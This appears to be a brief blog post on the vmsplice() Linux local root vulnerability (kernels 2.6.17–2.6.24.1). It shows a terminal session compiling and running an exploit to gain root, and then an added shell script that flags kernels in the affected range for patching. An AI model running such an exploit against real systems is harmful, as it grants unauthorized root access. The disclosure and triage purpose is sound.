There's a new Linux local root exploit,
working on kernels 2.6.17 – 2.6.24.1. It's been a long time since such a big
hole was found in so many kernel versions at once. The exploit was confirmed
to work on Ubuntu, Debian, Fedora and possibly many more. So it looks like
we'll need a run of quick updates, goddamnit! The hole is in the vmsplice()
function, which, by the way, can easily be disabled at kernel compilation
time.
Fortunately a quick fix that works on a live system already exists (it doesn't require reinstalling the kernel).
The exploit in action:
wanted@fafik:/crack/local-root-exp$ gcc exp.c -static -Wno-format
wanted@fafik:/crack/local-root-exp$ ./a.out
———————————–
 Linux vmsplice Local Root Exploit
 By qaaz
———————————–
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ede000 .. 0xb7f10000
[+] root
root@fafik:/crack/local-root-exp# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),106(lpadmin),107(admin),1000(wanted)
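A quick triage script for admins, added here as an example and not part of the original post or of the exploit: it checks whether a kernel version string falls inside the range the post names as vulnerable, 2.6.17 through 2.6.24.1, so you can see at a glance which boxes need the update first. The range endpoints come from the post; the function names, the version-parsing approach and the use of `uname -r` as the input are my own assumptions. One caveat a practitioner should keep in mind: distributions often backport security fixes without bumping the version number, so a kernel inside this range may already be patched, and a version check alone is a prioritisation aid, not proof of vulnerability or of its absence.

```shell
#!/bin/sh
# Added example (not from the original post): flag kernel versions inside
# the range the post reports as vulnerable to the vmsplice() local root hole.
# Assumes the usual "2.6.22-14-generic" style version string from `uname -r`.

# to_key: turn "2.6.24.1" into a fixed-width numeric key ("002006024001") so
# that versions can be compared as plain integers. Any suffix starting with
# "-", "_" or "+" (distro build tags, "-rc" labels) is stripped first, and a
# missing fourth field counts as 0, so "2.6.22" sorts below "2.6.22.1".
to_key() {
    printf '%s' "$1" | sed 's/[-_+].*$//' | awk -F. '{
        printf "%03d%03d%03d%03d\n", $1+0, $2+0, $3+0, $4+0
    }'
}

# Hypothetical helper: returns 0 (true) when the version lies in
# [2.6.17, 2.6.24.1], the range named in the post, and 1 otherwise.
vmsplice_kernel_affected() {
    vk_key=$(to_key "$1")
    vk_lo=$(to_key "2.6.17")
    vk_hi=$(to_key "2.6.24.1")
    if [ "$vk_key" -ge "$vk_lo" ] && [ "$vk_key" -le "$vk_hi" ]; then
        return 0
    else
        return 1
    fi
}

# Hypothetical helper: check the running kernel and print a verdict.
# Remember that distro kernels may carry a backported fix at the same
# version number, so "in range" means "check the changelog", not "exploitable".
check_running_kernel() {
    running=$(uname -r)
    if vmsplice_kernel_affected "$running"; then
        echo "kernel $running is in the 2.6.17 .. 2.6.24.1 range: verify the vmsplice fix is applied"
        return 0
    else
        echo "kernel $running is outside the range reported for this hole"
        return 1
    fi
}

# Run the check when executed directly (a non-zero exit means "not in range").
[ "${VMSPLICE_CHECK_NO_MAIN:-}" = "1" ] || check_running_kernel
```

Run it as `sh vmsplice-check.sh` on each host, or feed version strings from an inventory to `vmsplice_kernel_affected` in a loop; set `VMSPLICE_CHECK_NO_MAIN=1` when sourcing the file only for its functions.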

